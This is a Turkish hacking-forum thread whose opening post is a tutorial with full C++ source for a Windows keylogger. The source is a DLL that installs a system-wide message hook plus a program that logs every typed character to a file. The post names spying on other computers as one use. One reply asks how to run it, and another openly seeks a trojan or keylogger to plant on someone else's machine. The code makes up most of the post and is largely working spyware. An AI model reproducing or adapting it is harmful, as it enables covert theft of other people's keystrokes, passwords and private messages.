C++'da Keylogger | General3333 oku ;)

alperonline

Katılımcı Üye
22 Ara 2006
463
13
Adana
C++ta Keylogger

Giriş

Keylogger niçin kullanılır? Normal kullanım için örneğin kullanıcıyı
rahatsız etmeden sessiz bir şekilde çalışan programın belli tuş kambinasyonuna
basıldıktan sonra arayüzünün açılması ve ya başka şeyler işler yapması için ves.
Bundan başka keyloggerler casus olarak başka bilgisayarda yerleşerek basılan tuşları
kaydederek başka yere gönderilmesini yani casusluk ve gizliden başkalarını
takip etmek içinde kullanılır.

Metodlar

Sembollerin klavyeden girilmesi ile windows bunu WM_KEYDOWN, WM_KEYUP ile
çalışan pencereye mesaj olarak bildiriyor.Genelde fonksiyonla gönderilen
bu mesajlar basılan tuşların virtual kodlarını iletirler.Bunlarla çalışmak
çok zordur çünkü bunları sembollere çevirmek bize düşüyor.Bu fonksiyonu genelde
WinAPI’deki TranslateMessage() fonksiyonu yerine getiriyor.Bu fonksiyon alınan virtual
kodları sembollere(WM_CHAR) çeviriyor.

SetWindowHookEx fonksiyonu ile ise Windowsun klavyeden okuduğu tuşları okuyoruz.
Bizi WM_CHAR mesajı ilgilendiriyor.Bunun için biz bu fonksiyonu WM_GETMESSAGE parametresi
ile çağırıyoruz.SetWindowHookEx ile her klavye girişi yapılınca(Daha doğrusu her GetMessage veya PeekMessage
fonkisyonu çalışınca) çalışacak callback fonksiyonu tanımlamış oluyoruz.Sistem klavyeden
alınan girdileri programlara iletmeden önce bizim kurduğumuz tuzağa yani SetWindowHookEx
fonksiyonu tarafından alınarak işlenir.Bu fonksiyonla hem ayrı proselerdeki tuş basımını takip
edebilceğimiz gibi tüm sistemdekini de yapabiliriz.Tüm sistemde yani hangi pencere açık olursa olsun klavye hareketleri
takip için global olarak fonksiyon için bir dll oluşturmamız gerekir.


Aşagıda Şimdi ise bu hook fonksiyonun bulunduğu dll’nin ve basılan tuşları dll’den öğrenerek bunu bir dosyaya yazan
programların kodlarını göreceğiz:


MyHookDll.h (bu bizim dll’nin arayüzüdür.Burada SetHook ve UnsetHook fonksiyonları export ediyoruz.)
------------------------------------------
#define MYHOOKDLL_API __declspec(dllexport)

#include <windows.h>

extern "C"
{
MYHOOKDLL_API int SetHook( HWND,UINT );
MYHOOKDLL_API int UnSetHook();
}
--------------------------------------------


MyHookDll.cpp (Dll’nin kodu)
------------------------------------------------------------------------------
#include "MyHookDll.h"

// global değişkenler
HINSTANCE hInstance = NULL; // The instance of the DLL

// hook fonksiyonun gerçekleştirilmesi
LRESULT CALLBACK KeyboardMsgProc ( int, WPARAM, LPARAM );

#pragma data_seg(".SData")
HHOOK hMsgHook = NULL; // Hookun Handle
UINT KBoardMessage = NULL; // ana pencereye
// göndereceğimiz mesaj
HWND hParentWnd = NULL; // ana pencere
#pragma data_seg( )

//Shared akım yaratması için Linkere RWS atributuyla verilen komut
#pragma comment(linker,"/SECTION:.SData,RWS")

// Normal DllMain
BOOL APIENTRY DllMain( HANDLE hModule, DWORD ul_reason_for_call, LP**** lpReserved)
{
if (ul_reason_for_call == DLL_PROCESS_ATTACH)
hInstance = (HINSTANCE)hModule;

return TRUE;
}

// iki fonksiyon SetHook ve UnsetHook

MYHOOKDLL_API int SetHook (HWND hWnd,UINT UpdateMsg)
{
if (hWnd == NULL) return -1;

// parametreleri kaydet
hParentWnd = hWnd;
KBoardMessage = UpdateMsg;

// hook kur
hMsgHook= ::SetWindowsHookEx (WH_GETMESSAGE, KeyboardMsgProc, hInstance, 0);

if (hMsgHook == NULL)
return -1;

return 0;
};

MYHOOKDLL_API int UnSetHook()
{
UnhookWindowsHookEx (hMsgHook);

hMsgHook = NULL;

return 0;
};


//Hook callback fonksiyonu

LRESULT CALLBACK KeyboardMsgProc (int code, WPARAM wParam, LPARAM lParam)
{
if (code >= 0)
{
MSG * msg = (MSG * )lParam;

if ((lParam)
&&(msg->message == WM_CHAR)
&&(wParam == PM_REMOVE))

PostMessage (hParentWnd, KBoardMessage, msg->wParam, 0 );
}

return CallNextHookEx (hMsgHook, code ,wParam , lParam);
};
---------------------------------------------------------------------------------------Keylogger.cpp (Dllyi kullanarak alınan mesajları bir dosyaya kaydeden Programın kodları)
-----------------------------------------------------------------------------------------
#include <windows.h>
#include <stdio.h>

LRESULT CALLBACK LogWndProc(HWND, UINT, UINT, LONG);

// hooktan alacağımız mesaj
#define WM_HOOKMESSAGE WM_USER+1

// Global değişkenler
HWND hWnd; // ana handle
HINSTANCE hDllInst; // hook Dll

// fonksiyonlar
int ( * SetHook)( HWND,UINT);
int (* UnSetHook)();

// Programa giriş
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
MSG msg;
WNDCLASS wc;

// class ve pencere tuş basımı hakkında bilgi alıyor.
memset (&wc, 0, sizeof (wc));
wc.lpszClassName = "__MyKeyLogger";
wc.hInstance = hInstance;
wc.lpfnWndProc = LogWndProc;
wc.style = CS_HREDRAW | CS_VREDRAW ;
wc.hbrBackground = (HBRUSH)(COLOR_MENU+1);
wc.hCursor = LoadCursor(NULL, IDC_ARROW);

RegisterClass(&wc);

hWnd = ::CreateWindowEx (0,
"__MyKeyLogger",
"My KeyLogger",
WS_POPUP |WS_VISIBLE | WS_CAPTION | WS_SYSMENU |WS_THICKFRAME ,
0, 0, 200, 200,
NULL,
NULL,
hInstance,
0);

// Dll dahil ediyoruz
hDllInst = LoadLibrary((LPCTSTR) "myhookdll.dll");

if (hDllInst)
{
SetHook = (int ( *)(HWND, UINT ))GetProcAddress(hDllInst,"SetHook");
UnSetHook = (int ( *)( ))GetProcAddress(hDllInst, "UnSetHook");
}

// Hook ayarlıyoruz.
if(SetHook)SetHook(hWnd, WM_HOOKMESSAGE);


while (GetMessage(&msg, NULL, 0, 0))
{
DispatchMessage(&msg);
}

// hooku kaldırıyoruz.
if(UnSetHook)UnSetHook();

if (IsWindow(hWnd ))
DestroyWindow (hWnd );

// Dll çıkarıyoruz
if (hDllInst) FreeLibrary(hDllInst);
// çıkış
return 0;
}


// Pencerenin foksiyonu burada aldığımız mesajı işilyor ve kaydediyoruz
LRESULT CALLBACK LogWndProc(HWND hwnd, UINT Message, UINT wParam, LONG lParam)
{
FILE * f = fopen("a.log","a");

switch (Message)
{
case WM_CLOSE:
DestroyWindow(hwnd);
break;

case WM_HOOKMESSAGE:
switch(wParam)
{
// bazı semboller için onların adlarını gönderiyoruz.
case 0x08: fprintf(f,"<BkSp>");break;
case 0x1b: fprintf(f,"<Esc>");break;
case 0x0d: fprintf(f,"\n");break;
default:
fprintf(f,"%c",wParam );
}
break;

case WM_DESTROY:
case WM_ENDSESSION:
PostQuitMessage (0);
break;
}

fclose(f);

return DefWindowProc(hwnd,Message,wParam,lParam);
}
 

AnTiCorE__

Üye
16 Şub 2007
126
0
Bu baya güzelmişte dll ile exeyi nası kullancaz yani sadece exeyi çalıştırmamız yetcekmi?Exe gerekli fonksiyonları dll içinden mi çağırıyor bi açıklasanız...
 

samet21172

Yeni üye
30 Tem 2012
15
0
arkadaslar bırı bana karsı tarafa atmak ıcın trojen weya keylogger da yardımcı olsun napmam gerekıo kac gundur arıorum btun keyloggerın altına yazdım nerdeyse kımse yardımcı olmadı bırı yardım etsın parayla satın alıcam ama yıne napıcagımı bılmıorum hıc bılgım yok bu konuda ama mutlaka yapmam lazımlutfen yardımcı olsun bırı...
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.